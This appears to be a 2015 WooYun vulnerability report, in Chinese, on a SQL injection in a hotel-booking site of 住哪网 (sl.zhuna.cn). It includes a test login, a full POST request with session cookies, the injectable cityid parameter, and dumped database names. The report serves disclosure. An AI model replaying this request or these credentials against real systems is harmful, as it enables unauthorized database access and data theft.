乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-29: 细节已通知厂商并且等待厂商处理中 2015-04-29: 厂商已经确认,细节仅向厂商公开 2015-05-09: 细节向核心白帽子及相关领域专家公开 2015-05-19: 细节向普通白帽子公开 2015-05-29: 细节向实习白帽子公开 2015-06-13: 细节向公众公开
住哪网某站隐秘漏洞威胁诸多数据库为什么说隐秘呢?因为这么多人包括我在内,第一轮都没发现
站点:http://sl.zhuna.cn/ 登录测试账号:wangling 密码:123456
POST /findhotel/search_hotel HTTP/1.1Host: sl.zhuna.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: Hm_lvt_eac0c3863f9fda1a2681e8f1c2d552c5=1430107010,1430118061,1430204249,1430208479; agent_id=0; tma=246277199.20547671.1427675604008.1430101102388.1430204250537.6; tmd=31.246277199.20547671.1427675604008.; NTKF_T2D_CLIENTID=guestTEMP0CD9-53CC-0474-248C-456B681B6F5B; __utma=193237938.1894456180.1428821323.1428821323.1430208480.2; __utmz=193237938.1428821323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zn%5Fqudao=405; Referer=http%3A%2F%2Fdns.aizhan.com%2Fhotels.yonyou.com%2F; union_id=shanglv_181; S0Oz_20eb_saltkey=Gc5Hh5zZ; S0Oz_20eb_lastvisit=1430201450; S0Oz_20eb_sid=l3yKnN; S0Oz_20eb_lastact=1430205056%09like.php%09; pgv_pvi=9588554298; safedog-flow-item=1CE7624EA61F953D599566A109560F97; agent%5Fid=4979209; _zn_log=1161813393553f4132dec17747654940; zhuna_union_ci_session=a%3A7%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%228cb4f195c0abf5864e4a7b4ff657e734%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22192.168.0.125%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A37.0%29+Gecko%2F20100101+Firefox%2F37.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1430270012%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22userinfo%22%3Ba%3A6%3A%7Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22181%22%3Bs%3A8%3A%22username%22%3Bs%3A8%3A%22wangling%22%3Bs%3A8%3A%22agent_id%22%3Bs%3A7%3A%224979209%22%3Bs%3A10%3A%22permission%22%3Bs%3A5%3A%22A%2CC%2CD%22%3Bs%3A4%3A%22logo%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22fcfs%22%3Bd%3A0.070000000000000007%3B%7Ds%3A13%3A%22userOtherInfo%22%3Ba%3A1%3A%7Bs%3A8%3A%22msgCount%22%3Bi%3A0%3B%7D%7D50391b8b2e7c8fbef44e6c78f2154d25X-Forwarded-For: 8.8.8.8Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 62key=&lat=39.96587242&lng=116.4490421&cityid=0101&lableid=&pg=1
参数:cityid
current user: 'user_r_slpt'back-end DBMS: Microsoft SQL Server 2008current database: 'hotel_9tour_cn'available databases [8]:[*] global_hotel[*] hotel_9tour_cn[*] master[*] model[*] msdb[*] tempdb[*] www_zhuna_cn_jipiao[*] www_zhuna_cn_yufu2
上图:
危害等级:高
漏洞Rank:15
确认时间:2015-04-29 10:30
非常感谢您反馈的信息,相关问题已交由技术处理。
暂无